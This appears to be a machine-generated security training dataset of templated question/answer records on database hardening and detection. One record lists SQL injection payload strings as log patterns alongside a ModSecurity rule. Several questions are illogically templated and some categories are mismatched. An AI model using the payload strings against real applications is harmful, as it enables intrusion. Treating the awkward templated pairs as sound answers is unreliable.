+{"id": "trtp-239fc071b868", "instruction": "What security risks are associated with Database Backup Security?", "output": "Backups are often less protected than production databases but contain the same sensitive data. Attackers target backups for easier data exfiltration. Unencrypted backups on shared storage are common vulnerabilities.\n\nCommon attack vectors include:\n- Backup file theft\n- Cloud storage bucket misconfiguration\n- Backup media theft\n- Ransomware targeting backups", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185438Z", "updated_at": "2025-12-17T19:35:42.185438Z"}
+{"id": "trtp-c4effa940fdc", "instruction": "What are common attack techniques involving Database Backup Security?", "output": "Attack techniques involving Database Backup Security:\n\n- Backup file theft\n- Cloud storage bucket misconfiguration\n- Backup media theft\n- Ransomware targeting backups\n\nDefenders can detect these attacks by:\n- Backup access monitoring\n- Backup integrity verification\n- Unauthorized backup access attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185452Z", "updated_at": "2025-12-17T19:35:42.185452Z"}
+{"id": "trtp-70e6067dcd8f", "instruction": "What log entries indicate Database Backup Security attacks?", "output": "Methods for detecting Database Backup Security attacks or anomalies:\n\n- Backup access monitoring\n- Backup integrity verification\n- Unauthorized backup access attempts\n- Backup storage security scanning", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185463Z", "updated_at": "2025-12-17T19:35:42.185463Z"}
+{"id": "trtp-2046c1fb2183", "instruction": "How can organizations protect against Database Backup Security?", "output": "Security controls and preventive measures for Database Backup Security:\n\n- Encrypt all backups\n- Secure backup storage access\n- Test backup restoration regularly\n- Implement backup retention policies\n- Offline/immutable backup copies\n\nBackups are often less protected than production databases but contain the same sensitive data. Attackers target backups for easier data exfiltration. Unencrypted backups on shared storage are common vulnerabilities.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185485Z", "updated_at": "2025-12-17T19:35:42.185485Z"}
+{"id": "trtp-5c62a4e66f75", "instruction": "What does Database Backup Security look like in SQL?", "output": "Example of Database Backup Security:\n\n```sql\n# Encrypted PostgreSQL backup:\npg_dump -Fc production | openssl enc -aes-256-cbc -salt -out backup.dump.enc\n\n# SQL Server encrypted backup:\nBACKUP DATABASE production TO DISK = 'backup.bak'\nWITH ENCRYPTION (ALGORITHM = AES_256, SERVER CERTIFICATE = BackupCert);\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185496Z", "updated_at": "2025-12-17T19:35:42.185496Z"}
+{"id": "trtp-bccc2bb85932", "instruction": "What do security professionals need to know about Database Patch Management?", "output": "Database software vulnerabilities require timely patching. Patch management balances security urgency with stability requirements. Critical security patches should be expedited while following change management.\n\nSecurity Relevance: Unpatched databases are vulnerable to known exploits. Public CVEs have readily available exploit code. Delayed patching provides attackers a window of opportunity.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187236Z", "updated_at": "2025-12-17T19:35:42.187236Z"}
+{"id": "trtp-13e4df43869b", "instruction": "Describe the technical aspects of Database Patch Management.", "output": "Database Patch Management consists of the following key components:\n\n- Vulnerability tracking\n- Patch testing procedures\n- Change management integration\n- Downtime planning\n- Rollback procedures", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187255Z", "updated_at": "2025-12-17T19:35:42.187255Z"}
+{"id": "trtp-b181be008526", "instruction": "Why is Database Patch Management important for database security?", "output": "Unpatched databases are vulnerable to known exploits. Public CVEs have readily available exploit code. Delayed patching provides attackers a window of opportunity.\n\nCommon attack vectors include:\n- Exploiting known CVEs\n- Zero-day attacks (before patches)\n- Supply chain attacks via updates\n- Rollback attacks to vulnerable versions", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187270Z", "updated_at": "2025-12-17T19:35:42.187270Z"}
+{"id": "trtp-0cdb5d390d33", "instruction": "What are common attack techniques involving Database Patch Management?", "output": "Attack techniques involving Database Patch Management:\n\n- Exploiting known CVEs\n- Zero-day attacks (before patches)\n- Supply chain attacks via updates\n- Rollback attacks to vulnerable versions\n\nDefenders can detect these attacks by:\n- Version monitoring\n- Vulnerability scanning\n- CVE tracking", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187284Z", "updated_at": "2025-12-17T19:35:42.187284Z"}
+{"id": "trtp-cc9cd37f84c4", "instruction": "What indicators reveal malicious activity involving Database Patch Management?", "output": "Methods for detecting Database Patch Management attacks or anomalies:\n\n- Version monitoring\n- Vulnerability scanning\n- CVE tracking\n- Patch compliance reporting", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187295Z", "updated_at": "2025-12-17T19:35:42.187295Z"}
+{"id": "trtp-d4d4ed9dc7e0", "instruction": "What are best practices for preventing Database Patch Management?", "output": "Security controls and preventive measures for Database Patch Management:\n\n- Subscribe to security advisories\n- Test patches promptly\n- Expedite critical security patches\n- Maintain patch compliance metrics\n- Regular vulnerability assessments\n\nUnpatched databases are vulnerable to known exploits. Public CVEs have readily available exploit code. Delayed patching provides attackers a window of opportunity.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187308Z", "updated_at": "2025-12-17T19:35:42.187308Z"}
+{"id": "trtp-8251260be13a", "instruction": "What does Database Patch Management look like in SQL?", "output": "Example of Database Patch Management:\n\n```sql\n# Check PostgreSQL version:\nSELECT version();\n\n# Check SQL Server version:\nSELECT @@VERSION;\n\n# Example CVE check:\n# CVE-2019-9193: PostgreSQL arbitrary code execution\n# Fixed in: 9.4.22, 9.5.17, 9.6.13, 10.8, 11.3\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187319Z", "updated_at": "2025-12-17T19:35:42.187319Z"}
+{"id": "trtp-b021c5d3f641", "instruction": "What is Disabling Dangerous Database Features and why is it important for database security?", "output": "Database systems include features that, while useful, create security risks when exploited. Disabling or restricting dangerous features reduces attack surface. Features like xp_cmdshell, UTL_FILE, and external languages should be controlled.\n\nSecurity Relevance: Dangerous features provide attack paths from SQL injection to system compromise. Disabling unused features eliminates these paths. When features are required, restrict access to minimal accounts.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189072Z", "updated_at": "2025-12-17T19:35:42.189072Z"}
+{"id": "trtp-49b26499ecb5", "instruction": "What are the main parts of Disabling Dangerous Database Features that security teams should understand?", "output": "Disabling Dangerous Database Features consists of the following key components:\n\n- Command execution features\n- File system access\n- Network access functions\n- External language integration\n- Administrative extended procedures", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189093Z", "updated_at": "2025-12-17T19:35:42.189093Z"}
+{"id": "trtp-98dab4bcccf2", "instruction": "How can Disabling Dangerous Database Features lead to database security incidents?", "output": "Dangerous features provide attack paths from SQL injection to system compromise. Disabling unused features eliminates these paths. When features are required, restrict access to minimal accounts.\n\nCommon attack vectors include:\n- xp_cmdshell command execution\n- File read/write through SQL\n- Network operations via database\n- UDF-based code execution", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189107Z", "updated_at": "2025-12-17T19:35:42.189107Z"}
+{"id": "trtp-51a4dc69259c", "instruction": "What attacks exploit Disabling Dangerous Database Features?", "output": "Attack techniques involving Disabling Dangerous Database Features:\n\n- xp_cmdshell command execution\n- File read/write through SQL\n- Network operations via database\n- UDF-based code execution\n\nDefenders can detect these attacks by:\n- Dangerous feature usage monitoring\n- Configuration change detection\n- Feature enablement alerts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189121Z", "updated_at": "2025-12-17T19:35:42.189121Z"}
+{"id": "trtp-1f95addc6a02", "instruction": "How can security teams detect attacks related to Disabling Dangerous Database Features?", "output": "Methods for detecting Disabling Dangerous Database Features attacks or anomalies:\n\n- Dangerous feature usage monitoring\n- Configuration change detection\n- Feature enablement alerts\n- Privilege grants for dangerous features", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189134Z", "updated_at": "2025-12-17T19:35:42.189134Z"}
+{"id": "trtp-c124c160e6cc", "instruction": "What are best practices for preventing Disabling Dangerous Database Features?", "output": "Security controls and preventive measures for Disabling Dangerous Database Features:\n\n- Disable xp_cmdshell, UTL_FILE, etc.\n- Restrict secure_file_priv\n- Disable CLR/Java unless required\n- Regular feature audit\n- Minimal privilege for required features\n\nDangerous features provide attack paths from SQL injection to system compromise. Disabling unused features eliminates these paths. When features are required, restrict access to minimal accounts.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189146Z", "updated_at": "2025-12-17T19:35:42.189146Z"}
+{"id": "trtp-6d8624ae6d7b", "instruction": "What is the syntax for Disabling Dangerous Database Features?", "output": "Example of Disabling Dangerous Database Features:\n\n```sql\n-- SQL Server: disable xp_cmdshell\nEXEC sp_configure 'xp_cmdshell', 0;\nRECONFIGURE;\n\n-- PostgreSQL: restrict file access\nALTER SYSTEM SET log_file_mode = '0600';\n\n-- MySQL: disable dangerous functions\n-- In my.cnf:\n[mysqld]\nlocal-infile=0\nsecure-file-priv=/restricted/path\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189157Z", "updated_at": "2025-12-17T19:35:42.189157Z"}
+{"id": "trtp-082ee97ba9ff", "instruction": "Describe SQL Injection Detection Patterns and its role in database security.", "output": "SQL injection attacks exhibit recognizable patterns in logs and traffic. Detection involves identifying SQL keywords, special characters, and attack signatures in user input and query logs.\n\nSecurity Relevance: Early SQL injection detection prevents data breaches. Real-time detection enables blocking and alerting. Post-incident detection reveals compromise scope and attacker techniques.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190911Z", "updated_at": "2025-12-17T19:35:42.190911Z"}
+{"id": "trtp-e826ea63e2fa", "instruction": "What are the key components of SQL Injection Detection Patterns?", "output": "SQL Injection Detection Patterns consists of the following key components:\n\n- SQL keyword detection (UNION, SELECT, etc.)\n- Special character patterns (', \", --, ;)\n- Error message indicators\n- Query anomaly detection\n- WAF and IDS signatures", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190931Z", "updated_at": "2025-12-17T19:35:42.190931Z"}
+{"id": "trtp-680f391308f3", "instruction": "From a security perspective, why should defenders understand SQL Injection Detection Patterns?", "output": "Early SQL injection detection prevents data breaches. Real-time detection enables blocking and alerting. Post-incident detection reveals compromise scope and attacker techniques.\n\nCommon attack vectors include:\n- Parameter manipulation with SQL syntax\n- Error-based extraction attempts\n- Blind injection probing\n- Automated tool patterns (sqlmap)", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190945Z", "updated_at": "2025-12-17T19:35:42.190945Z"}
+{"id": "trtp-460c15762bee", "instruction": "What attacks exploit SQL Injection Detection Patterns?", "output": "Attack techniques involving SQL Injection Detection Patterns:\n\n- Parameter manipulation with SQL syntax\n- Error-based extraction attempts\n- Blind injection probing\n- Automated tool patterns (sqlmap)\n\nDefenders can detect these attacks by:\n- SQL keywords in request parameters\n- Database error messages in responses\n- Sequential true/false condition testing", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190959Z", "updated_at": "2025-12-17T19:35:42.190959Z"}
+{"id": "trtp-aa106e4b5385", "instruction": "How do you detect exploitation of SQL Injection Detection Patterns?", "output": "Methods for detecting SQL Injection Detection Patterns attacks or anomalies:\n\n- SQL keywords in request parameters\n- Database error messages in responses\n- Sequential true/false condition testing\n- Time-based delay patterns\n- Unusual query execution times", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190970Z", "updated_at": "2025-12-17T19:35:42.190970Z"}
+{"id": "trtp-b224df6328f3", "instruction": "What preventive measures address SQL Injection Detection Patterns vulnerabilities?", "output": "Security controls and preventive measures for SQL Injection Detection Patterns:\n\n- WAF rules for SQL injection\n- Input validation logging\n- Database query monitoring\n- Anomaly-based detection\n- Response monitoring for errors\n\nEarly SQL injection detection prevents data breaches. Real-time detection enables blocking and alerting. Post-incident detection reveals compromise scope and attacker techniques.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190982Z", "updated_at": "2025-12-17T19:35:42.190982Z"}
+{"id": "trtp-117e8e9342a7", "instruction": "Provide a code example for SQL Injection Detection Patterns.", "output": "Example of SQL Injection Detection Patterns:\n\n```sql\n-- Log patterns indicating SQL injection:\n-- Single quotes in input: ' OR 1=1--\n-- UNION attempts: UNION SELECT NULL,NULL\n-- Comment injection: admin'--\n-- Stacked queries: ; DROP TABLE\n\n-- WAF rule example (ModSecurity):\nSecRule ARGS \"(?i)(union.*select|select.*from|insert.*into)\" \"id:1000,deny,msg:'SQL Injection'\"\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190993Z", "updated_at": "2025-12-17T19:35:42.190993Z"}
+{"id": "trtp-47a3beadd425", "instruction": "What do security professionals need to know about Database Query Anomaly Detection?", "output": "Query anomaly detection identifies unusual database activity by comparing against baseline patterns. Anomalies include unusual tables accessed, query volume spikes, new query patterns, and time-of-day variations.\n\nSecurity Relevance: Anomaly detection catches attacks that bypass signature-based detection. It identifies compromised credentials, insider threats, and novel attack techniques. Baselines must be maintained.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192862Z", "updated_at": "2025-12-17T19:35:42.192862Z"}
+{"id": "trtp-703b627f754f", "instruction": "Describe the technical aspects of Database Query Anomaly Detection.", "output": "Database Query Anomaly Detection consists of the following key components:\n\n- Query baseline establishment\n- Statistical anomaly detection\n- Machine learning models\n- Query pattern analysis\n- User behavior analytics", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192883Z", "updated_at": "2025-12-17T19:35:42.192883Z"}
+{"id": "trtp-f9a2366d1293", "instruction": "How can Database Query Anomaly Detection lead to database security incidents?", "output": "Anomaly detection catches attacks that bypass signature-based detection. It identifies compromised credentials, insider threats, and novel attack techniques. Baselines must be maintained.\n\nCommon attack vectors include:\n- Data exfiltration through normal queries\n- Credential abuse\n- Insider data theft\n- Low-and-slow extraction", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192897Z", "updated_at": "2025-12-17T19:35:42.192897Z"}
+{"id": "trtp-0a889a311cc2", "instruction": "What are common attack techniques involving Database Query Anomaly Detection?", "output": "Attack techniques involving Database Query Anomaly Detection:\n\n- Data exfiltration through normal queries\n- Credential abuse\n- Insider data theft\n- Low-and-slow extraction\n\nDefenders can detect these attacks by:\n- Query volume spikes\n- New tables or columns accessed\n- Unusual query times", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192911Z", "updated_at": "2025-12-17T19:35:42.192911Z"}
+{"id": "trtp-a3e3909fba68", "instruction": "What log entries indicate Database Query Anomaly Detection attacks?", "output": "Methods for detecting Database Query Anomaly Detection attacks or anomalies:\n\n- Query volume spikes\n- New tables or columns accessed\n- Unusual query times\n- Behavioral baseline deviation\n- Cross-database access patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192923Z", "updated_at": "2025-12-17T19:35:42.192923Z"}
+{"id": "trtp-72715f5da9e3", "instruction": "What are best practices for preventing Database Query Anomaly Detection?", "output": "Security controls and preventive measures for Database Query Anomaly Detection:\n\n- Establish query baselines\n- Monitor for deviations\n- Alert on anomalies\n- Regular baseline updates\n- User behavior profiling\n\nAnomaly detection catches attacks that bypass signature-based detection. It identifies compromised credentials, insider threats, and novel attack techniques. Baselines must be maintained.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192935Z", "updated_at": "2025-12-17T19:35:42.192935Z"}
+{"id": "trtp-673f78c237a5", "instruction": "What does Database Query Anomaly Detection look like in SQL?", "output": "Example of Database Query Anomaly Detection:\n\n```sql\n-- PostgreSQL query logging for analysis:\n-- postgresql.conf:\nlog_statement = 'all'\nlog_duration = on\nlog_line_prefix = '%t [%p]: user=%u,db=%d,app=%a '\n\n-- Analysis queries:\n-- Unusual table access\nSELECT usename, query FROM pg_stat_activity\nWHERE query LIKE '%information_schema%';\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192945Z", "updated_at": "2025-12-17T19:35:42.192945Z"}
+{"id": "trtp-abdd15eef82d", "instruction": "Describe Database Authentication Monitoring and its role in database security.", "output": "Authentication monitoring detects credential attacks, unauthorized access attempts, and compromised accounts. Key indicators include failed logins, unusual login times, and connections from unexpected sources.\n\nSecurity Relevance: Authentication attacks are often the first stage of database compromise. Monitoring detects brute force, credential stuffing, and unauthorized access. Rapid detection prevents data theft.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194713Z", "updated_at": "2025-12-17T19:35:42.194713Z"}
+{"id": "trtp-26b06b345213", "instruction": "What elements make up Database Authentication Monitoring?", "output": "Database Authentication Monitoring consists of the following key components:\n\n- Failed login tracking\n- Source IP analysis\n- Time-of-day patterns\n- Account lockout monitoring\n- New account creation", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194732Z", "updated_at": "2025-12-17T19:35:42.194732Z"}
+{"id": "trtp-10f760ab33ad", "instruction": "How can Database Authentication Monitoring lead to database security incidents?", "output": "Authentication attacks are often the first stage of database compromise. Monitoring detects brute force, credential stuffing, and unauthorized access. Rapid detection prevents data theft.\n\nCommon attack vectors include:\n- Brute force password attacks\n- Credential stuffing\n- Account enumeration\n- Password spraying", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194748Z", "updated_at": "2025-12-17T19:35:42.194748Z"}
+{"id": "trtp-50434ea0aa87", "instruction": "What are common attack techniques involving Database Authentication Monitoring?", "output": "Attack techniques involving Database Authentication Monitoring:\n\n- Brute force password attacks\n- Credential stuffing\n- Account enumeration\n- Password spraying\n\nDefenders can detect these attacks by:\n- Multiple failed login attempts\n- Logins from unusual IPs\n- Off-hours authentication", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194761Z", "updated_at": "2025-12-17T19:35:42.194761Z"}
+{"id": "trtp-d4fdebffa9eb", "instruction": "What should analysts look for when monitoring for Database Authentication Monitoring?", "output": "Methods for detecting Database Authentication Monitoring attacks or anomalies:\n\n- Multiple failed login attempts\n- Logins from unusual IPs\n- Off-hours authentication\n- Service account misuse\n- Concurrent logins from multiple locations", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194773Z", "updated_at": "2025-12-17T19:35:42.194773Z"}
